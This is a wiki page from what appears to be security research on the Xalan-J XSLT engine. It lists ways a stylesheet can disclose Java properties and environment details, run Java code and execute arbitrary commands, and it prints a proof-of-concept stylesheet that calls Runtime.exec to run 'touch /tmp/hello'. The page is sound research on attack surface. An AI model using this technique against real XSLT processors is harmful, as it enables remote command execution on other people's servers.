Wiki source code of Engine_XalanJ
Version 40.1 by Nicolas Gregoire on 2012/01/11 23:29
Show last authors
| author | version | line-number | content |
|---|---|---|---|
| 1 | [[Xalan-J>>http://xml.apache.org/xalan-j/||rel="__blank" title="Xalan-J Home Page"]] is a Java based XSLT engine by the Apache Project. | ||
| 2 | |||
| 3 | |||
| 4 | == Supported version == | ||
| 5 | |||
| 6 | 1.0 | ||
| 7 | |||
| 8 | == Command line == | ||
| 9 | |||
| 10 | $> java org.apache.xalan.xslt.Process -in foo.xml -xsl foo.xsl | ||
| 11 | |||
| 12 | __Note__ : xml-apis.jar, xercesImpl.jar and xalan*.jar must be in the $CLASSPATH | ||
| 13 | |||
| 14 | == Identification strings == | ||
| 15 | |||
| 16 | |=xsl:vendor-url|http:~/~/xml.apache.org/xalan-j | ||
| 17 | |=xsl:vendor|Apache Software Foundation | ||
| 18 | |=xsl:version|1.0 | ||
| 19 | |||
| 20 | == Special features == | ||
| 21 | |||
| 22 | * Java properties disclosure | ||
| 23 | * Java environment disclosure | ||
| 24 | * Java code execution | ||
| 25 | * Arbitrary command execution | ||
| 26 | * File creation | ||
| 27 | * JDBC connectivity | ||
| 28 | |||
| 29 | == Java properties disclosure == | ||
| 30 | |||
| 31 | The xsl:system-property() standard function can be called with non standard arguments, mapped to Java properties. In this example, the name of the Java properties is stored in a separate XML file ([[properties.xml>>attach:properties.xml]]). The XSLT code will, for each property, display its name and its value. | ||
| 32 | |||
| 33 | |=Namespace|=Function|=PoC|=Sample output | ||
| 34 | |http:~/~/www.w3.org/1999/XSL/Transform|system-property()|[[xalanj-java-properties.xsl>>attach:xalanj-java-properties.xsl]]|[[xalanj-java-properties-output.txt>>attach:xalanj-java-properties-output.txt]] | ||
| 35 | |||
| 36 | == Java environment disclosure == | ||
| 37 | |||
| 38 | The checkEnvironment() extension function (documented [[here>>http://xml.apache.org/xalan-j/faq.html#faq-N10064||rel="__blank"]]) will display some information about the execution context (including available packages, paths, versions, ...). | ||
| 39 | |||
| 40 | |=Namespace|=Extension function|=PoC|=Sample output | ||
| 41 | |http:~/~/xml.apache.org/xalan|checkEnvironment()|[[xalanj-checkenv.xsl>>attach:xalanj-checkenv.xsl]]|[[xalanj-checkenv-output.txt>>attach:xalanj-checkenv-output.txt]] | ||
| 42 | |||
| 43 | == Java code execution == | ||
| 44 | |||
| 45 | The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution. | ||
| 46 | |||
| 47 | |||
| 48 | |=Namespace|=Extension function|=PoC|=Sample output | ||
| 49 | |http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date: | ||
| 50 | Wed Jan 11 22:45:07 CET 2012 | ||
| 51 | |||
| 52 | == Execution of external commands == | ||
| 53 | |||
| 54 | The following code will execute the command "touch /tmp/hello" : | ||
| 55 | |||
| 56 | <?xml version="1.0"?> | ||
| 57 | <xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform" | ||
| 58 | xmlns:j="http:~/~/xml.apache.org/xalan/java" | ||
| 59 | exclude-result-prefixes="j" | ||
| 60 | version="1.0"> | ||
| 61 | <xsl:template match="/"> | ||
| 62 | <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable> | ||
| 63 | <xsl:variable name="a" select="j:split($c, ' = ')"/> | ||
| 64 | <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/> | ||
| 65 | <xsl:variable name="p" select="j:exec($r, $a )"/> | ||
| 66 | No content at the moment ... | ||
| 67 | </xsl:template> | ||
| 68 | </xsl:stylesheet> |